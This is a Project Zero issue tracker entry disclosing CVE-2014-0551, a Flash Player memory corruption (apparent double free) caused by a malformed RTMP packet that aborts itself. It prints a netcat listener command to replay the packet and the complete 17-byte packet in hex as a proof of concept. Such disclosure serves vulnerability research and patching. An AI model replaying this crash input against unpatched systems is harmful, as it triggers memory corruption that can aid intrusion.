76 - Flash memory corruption (double free?) with RTMP packet that aborts itself - project-zero

Monorail	Project: project-zero ▼ Issues People Development process History	Sign in

Starred by 5 users

Status:	Fixed
Owner:	█ cevans@google.com Email to this user bounced
Closed:	Sep 2014
Cc:	project-...@google.com
Id-2915 CVE-2014-0551 Reported-2014-Jul-23 CCProjectZeroMembers Finder-cevans Product-Flash Severity-High Vendor-Adobe Fixed-2014-Sep-9

Flash memory corruption (double free?) with RTMP packet that aborts itself

Reported by cevans@google.com, Jul 24 2014

Back to list

A SWF to reproduce is attached, along with the source. The SWF simply attempts a connection to rtmp://localhost/

The "bad" RTMP packet is attached. To replay it, use something like this (Linux command line) on the localhost machine:

nc -l 1935 < doublefree.rtmp

The packet is pretty small so here it is in its entirety:

01 02 00 00 00 00 00 04 02 00 00 00 00 00 00 00 02

RTMPLocal.swf
1.2 KB Download

doublefree.rtmp
17 bytes Download

RTMPLocal.as
2.0 KB Download

Comment 1 by cevans@google.com, Jul 24 2014

Labels: Id-2915

Comment 2 by cevans@google.com, Sep 5 2014

Labels: CVE-2014-0551

Comment 3 by cevans@google.com, Sep 9 2014

Labels: Fixed-2014-Sep-9
Status: Fixed

http://helpx.adobe.com/security/products/flash-player/apsb14-21.html

Will derestrict in a week or so, etc.

Comment 4 by cevans@google.com, Sep 23 2014

Labels: -Restrict-View-Commit

Making public.

► Sign in to add a comment